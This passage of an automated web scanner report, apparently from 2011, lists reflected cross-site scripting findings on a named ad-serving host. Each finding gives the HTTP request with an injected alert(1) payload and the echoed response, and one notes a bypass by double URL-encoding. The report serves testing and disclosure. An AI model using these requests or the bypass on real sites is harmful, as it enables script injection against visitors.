GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488aa04f"-alert(1)-"69f6ed3ba42&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296399000**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488aa04f"-alert(1)-"69f6ed3ba42&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9">
...[SNIP]...

5.142. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19848"-alert(1)-"51dae16ac72 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G19848"-alert(1)-"51dae16ac72&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296398981**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G19848"-alert(1)-"51dae16ac72&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9">
...[SNIP]...

5.143. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dcce"-alert(1)-"9ebcb941c85 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!5dcce"-alert(1)-"9ebcb941c85&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296398942**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!5dcce"-alert(1)-"9ebcb941c85&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9">
...[SNIP]...

5.144. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad392"-alert(1)-"602f61bfc3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9&ad392"-alert(1)-"602f61bfc3a=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1683

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9&ad392"-alert(1)-"602f61bfc3a=1">
...[SNIP]...

5.145. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48c66"-alert(1)-"510a8f1797d was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=801063948c66"-alert(1)-"510a8f1797d&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
oto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351609**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=801063948c66"-alert(1)-"510a8f1797d&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a">
...[SNIP]...

5.146. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2c3a"-alert(1)-"4061da44426 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147b2c3a"-alert(1)-"4061da44426&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351649**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147b2c3a"-alert(1)-"4061da44426&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a">
...[SNIP]...

5.147. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40464"-alert(1)-"1a138402111 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a40464"-alert(1)-"1a138402111 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:41:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
*;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a40464"-alert(1)-"1a138402111">
...[SNIP]...

5.148. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9971a"-alert(1)-"2de8531fbc7 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ9971a"-alert(1)-"2de8531fbc7&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:41:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
6e6a631357/353.0.js.120x30/1296351662**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ9971a"-alert(1)-"2de8531fbc7&ASID=b7e3b00f832b4ae1873eac83f051400a">
...[SNIP]...

5.149. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e9b2%2522%253balert%25281%2529%252f%252f370d1d97dd was submitted in the REST URL parameter 2. This input was echoed as 7e9b2";alert(1)//370d1d97dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313577e9b2%2522%253balert%25281%2529%252f%252f370d1d97dd/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:43:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1679

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313577e9b2";alert(1)//370d1d97dd/353.0.js.120x30/1296351787**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3
...[SNIP]...

5.150. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d997%2522%253balert%25281%2529%252f%252fcb75c44487c was submitted in the REST URL parameter 3. This input was echoed as 4d997";alert(1)//cb75c44487c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x304d997%2522%253balert%25281%2529%252f%252fcb75c44487c/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:43:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x304d997";alert(1)//cb75c44487c/1296351797**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873e
...[SNIP]...

5.151. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a330d"-alert(1)-"69480e9465 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488a330d"-alert(1)-"69480e9465&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1679

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351635**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488a330d"-alert(1)-"69480e9465&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a">
...[SNIP]...

5.152. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eec55"-alert(1)-"8b7e3018d80 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Geec55"-alert(1)-"8b7e3018d80&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
